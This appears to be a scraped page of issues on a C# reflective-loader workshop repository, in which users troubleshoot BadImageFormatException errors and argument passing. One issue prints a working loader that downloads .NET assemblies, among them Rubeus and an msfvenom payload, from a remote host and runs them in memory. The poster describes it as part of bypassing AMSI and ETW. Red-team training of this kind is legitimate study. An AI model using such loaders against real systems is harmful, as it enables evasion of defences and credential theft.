jfmaes / csharpreflectionworkshop Goto Github PK
View Code? Open in Web Editor NEWThe repository that complements the From zero to hero: creating a reflective loader in C# workshop
csharpreflectionworkshop's People
Contributors
Stargazers
Watchers
Forkers
kelamrani benheise curtishoughton sunnyneo myhkho zhouzu l4ckyguy beerandgin koolacac sepo79 teststudent311 hvauto cmjlove1csharpreflectionworkshop's Issues
Unhandled exception. System.BadImageFormatException: Bad IL format. The format of the file 'D:\SecToolDev\CSharpLoader\CSharpLoader\bin\Release\net5.0\CSharpLoader.exe' is invalid.
Not really an issue with the code but I'm getting this error when running a custom c# binary using Raditz. Raditz works with the HelloWorld example but when I create my own 'Raditz' and a custom meterpreter c# loader, I get the above error. Both of my c# apps are .NET 5.0. The loader works on it's own and my 'Raditz' code is the same from the lab.
Any ideas what this could be cause by? Google show's that it's because the file I'm reflectively loading isn't a valid image file but it's a valid c# binary.
Thanks for doing this! It was an awesome talk/lab.
Issue With Raditz Loader
Hi there,
I was following your GitBook for reflective loading with C# and encountered a strange issue with in Section 2, with Raditz Loader.
For some strange reason, I'm getting the following error on both .NET 3.1 (LTS) and .NET 5.0:
System.BadImageFormatException: 'Bad IL format. The format of the file 'C:\Users\<username>\source\repos\Reflection World\Reflection World\bin\Release\net5.0\Reflection World.exe' is invalid.'
My code Raditz code is identical to yours:
using System;
using System.Reflection;
namespace Raditz
{
class Program
{
static void Reflect(string FilePath)
{
Assembly dotNetProgram = Assembly.LoadFile(FilePath);
Object[] parameters = new String[] { null };
dotNetProgram.EntryPoint.Invoke(null, parameters);
}
static void Main(string[] args)
{
Reflect(@"C:\Users\<username>\source\repos\Reflection World\Reflection World\bin\Release\net5.0\Reflection World.exe");
}
}
}while my Reflection World is the same from Section 1:
using System;
using System.Reflection;
namespace Reflection_World
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Hello from Reflection World!");
Console.ReadKey();
}
}
}At first, I thought it had to do with the .NET versions, because some threads in SO made me think so, but trying to execute Raditz Loader.exe would just give the same error (despite both projects being re-made in .NET 3.1). I also thought that Any CPU might've been the cause, but that changed nothing despite trying both x86 then a x64 CPU.
Any idea on what the cause for this might be?
Passing Arguments
i have a doubt that though using this technique, rubeus can be reflectively loaded but how to pass arguments to Rubeus to work with? Encountering errors when trying to put arguments in dotnetProgram.EntryPoint.Invoke(null, new string [] { "currentluid"};
please suggest😅
Issue while Calling WinAPI messagebox via reflection
Hi sir,
I have been following your C# reflection tutorial from your gitbook. It's really great for beginners like me to delve right in C# tradecraft development. Actually, I pinged you on twitter regarding this, and you then replied me with this gitbook repo, very much thankful to you.
I have been trying to call WinAPI messagebox (made by msfvenom) from my github repo. But it was not loading at all. I turned the Windows Defender to off for signature based detection reason.
Here, is the code (This was the final code where everything was combined to bypass AMSI and ETW and thereby executing Rubeus.exe)
BTW, I'm using 4.8 version of .NET framework
using System;
using System.Reflection;
using System.Net;
using System.Threading;
namespace Frieza
{
class Program
{
static void WebReflect(string url, int retrycount, int timeoutTimer)
{
// Dealing with HTTPS requests
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
// Creating a Web Client to make web requests
WebClient client = new WebClient();
// Downloading byte array from the provided link via client web request.
byte[] programBytes = null;
while (retrycount >= 0 && programBytes == null)
{
try
{
programBytes = client.DownloadData(url);
}
/* Unable to download assembly from url or if url server address is down, WebException is raised
link: https://docs.microsoft.com/en-us/dotnet/api/system.net.webexception.response?view=net-5.0
*/
catch (WebException ex)
{
Console.WriteLine("[-] Assembly not found yet. Sleeping for {0} seconds and retrying another {1} time...", timeoutTimer, retrycount);
retrycount--;
Thread.Sleep(timeoutTimer * 1000);
}
}
// If for some reason, assembly doesn't exist in the url, loader gracefully exits
if (programBytes == null)
{
Console.WriteLine("[-] Assembly was not found, exiting now...");
Environment.Exit(-1);
}
// Loading the assembly from byte array that was downloaded.
Assembly dotNetProgram = Assembly.Load(programBytes);
// Creates a new Object Array containing a new (empty) String Array
Object[] parameters = new String[] { null };
// Executes the entry point of the loaded assembly
dotNetProgram.EntryPoint.Invoke(null, parameters);
}
// Performing Double Reflection
// 1. http://10.0.2.55/exe/mscorlib.exe
// 2. https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_Any/Rubeus.exe
static void Main(string[] args)
{
try
{
Console.WriteLine("Hit a key to start");
Console.ReadKey();
// Download Link
//WebReflect("http://10.0.2.55/exe/mscorlib.exe", 0, 0);
WebReflect("https://github.com/reveng007/Executable_Files/raw/main/binaries/mscorlib.exe", 0, 0);
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
Console.WriteLine("could not load mscorlib, exitting gracefully.");
Environment.Exit(-1);
}
try
{ // Download link
//WebReflect("https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_Any/Rubeus.exe", 3, 5);
WebReflect("https://github.com/reveng007/Executable_Files/raw/main/binaries/messagebox.exe", 3, 5);
//WebReflect("http://10.0.2.55/exe/messagebox.exe", 3, 5);
Console.ReadKey();
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
Console.ReadKey();
}
}
}
}I just changed the 2nd reflection to my very own WinAPI messagebox executable.
It is running fine by it's own.
But When I'm calling it via reflection whether from github repo (https) or from webserver (http), same result ;(...
Can you please help me out from this?
PS: I'm just doing for the sake of curiosity.
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.